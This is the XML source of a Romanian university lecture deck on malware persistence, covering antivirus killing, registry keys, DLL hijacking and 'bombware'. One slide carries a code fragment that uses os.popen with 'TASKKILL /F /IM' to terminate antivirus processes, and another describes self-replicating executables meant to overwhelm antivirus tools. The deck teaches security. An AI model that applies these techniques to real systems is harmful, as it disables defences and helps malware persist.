          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5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os</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popen</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"TASKKILL /F /IM \"{}\""</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format</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5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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5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500">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="500">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="316992" y="5060650"/>
            <a:ext cx="5922264" cy="859536"/>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solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Din cand in cand si functioneaza…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19100282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62057" y="2978621"/>
            <a:ext cx="3048000" cy="2395728"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>bombware</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581193" y="2180496"/>
            <a:ext cx="4740616" cy="3678303"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Execution via fisiune</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Se începe de la un fisier executat, care creaza altele doua, le executa iar acelea la randul lor reiau fiecare ciclu. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Probabilitate de AV-DoS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Flowchart: Process 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="435864" y="1943099"/>
            <a:ext cx="11280648" cy="4776537"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4595236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918981" y="884937"/>
            <a:ext cx="9755187" cy="2766528"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" u="sng"/>
              <a:t>C.14.2</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Persistenta malware</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7060309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Process 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="435864" y="1943099"/>
            <a:ext cx="11280648" cy="4776537"/>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
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>persistenta</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98217" y="2029968"/>
            <a:ext cx="7587134" cy="4474464"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21276882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Chei de registrii</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81584" y="2539698"/>
            <a:ext cx="11247120" cy="3181618"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Flowchart: Process 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="889270" y="2384250"/>
            <a:ext cx="2012426" cy="1334310"/>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
        <p:nvSpPr>
          <p:cNvPr id="6" name="Flowchart: Process 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3127248" y="2384250"/>
            <a:ext cx="4364736" cy="1334310"/>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
        <p:nvSpPr>
          <p:cNvPr id="7" name="Flowchart: Process 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="291862" y="3874008"/>
            <a:ext cx="11631914" cy="2002756"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19562259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03670" y="-12700"/>
            <a:ext cx="8584660" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Flowchart: Process 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1803670" y="3236976"/>
            <a:ext cx="1896602" cy="359664"/>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ctr"/>
            <a:endParaRPr lang="en-US" kern="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:latin typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2417962697"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/_rels/them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366658"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="8CB64A"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="88D5A9"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="969FA7"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="E8A844"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="A1561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4BEC0EAF-CF86-4D49-B83B-56CC62D3CFF1}"/>
    </a:ext>
  </a:extLst>
</a:theme>
</file>

<file path=ppt/theme/theme3.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="1_Main Event">
  <a:themeElements>
    <a:clrScheme name="Main Event">
      <a:dk1>
        <a:sysClr val="windowText" lastClr="000000"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="424242"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="C8C8C8"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="8FA751"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="629D7D"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="5A7AAB"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="AA618F"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="BA5445"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="C8A547"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="91BF1A"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="ADBE82"/>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CF823853-53CC-4249-AEDB-2EA9F718B2D2}"/>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3326</TotalTime>
  <Words>4539</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>199</Paragraphs>
  <Slides>33</Slides>
  <Notes>1</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33</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="46" baseType="lpstr">
      <vt:lpstr>Agency FB</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Gill Sans MT</vt:lpstr>
      <vt:lpstr>Impact</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings 2</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Dividend</vt:lpstr>
      <vt:lpstr>1_Main Event</vt:lpstr>
      <vt:lpstr>C.13 Metode de persistenta</vt:lpstr>
      <vt:lpstr>Principalele părți ale prezentării</vt:lpstr>
      <vt:lpstr>C.13.1 Anihilarea programelor antimalware</vt:lpstr>
      <vt:lpstr>Kill Anti-virus</vt:lpstr>
      <vt:lpstr>bombware</vt:lpstr>
      <vt:lpstr>C.14.2 Persistenta malware</vt:lpstr>
      <vt:lpstr>persistenta</vt:lpstr>
      <vt:lpstr>Chei de registrii</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Aplicații înregistrate ca servicii</vt:lpstr>
      <vt:lpstr>Set de tool-uri de securitate, experimentale si gratuite</vt:lpstr>
      <vt:lpstr>Câteva comenzi clasice de Windows care pot fi executate la distanță</vt:lpstr>
      <vt:lpstr>Comenzi pe care le puteți găsi la îndemână sau interesante</vt:lpstr>
      <vt:lpstr>Execution spoofing</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Prefetch</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>C.14.3 DLL Hijacking</vt:lpstr>
      <vt:lpstr>DLL hai jaking</vt:lpstr>
      <vt:lpstr>persistenta</vt:lpstr>
      <vt:lpstr>persistenta</vt:lpstr>
      <vt:lpstr>persistenta</vt:lpstr>
      <vt:lpstr>Incarcare directa</vt:lpstr>
      <vt:lpstr>Informatii suplimentare</vt:lpstr>
      <vt:lpstr>Bibliografie / resurse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C.1. Evolutia malware si a solutiilor de securitate</dc:title>
  <dc:creator>Dr. Paul A. Gagniuc</dc:creator>
  <cp:lastModifiedBy>Office</cp:lastModifiedBy>
  <cp:revision>280</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-02-20T09:23:33Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-05T00:10:32Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/thumbnail.jpeg>
</file>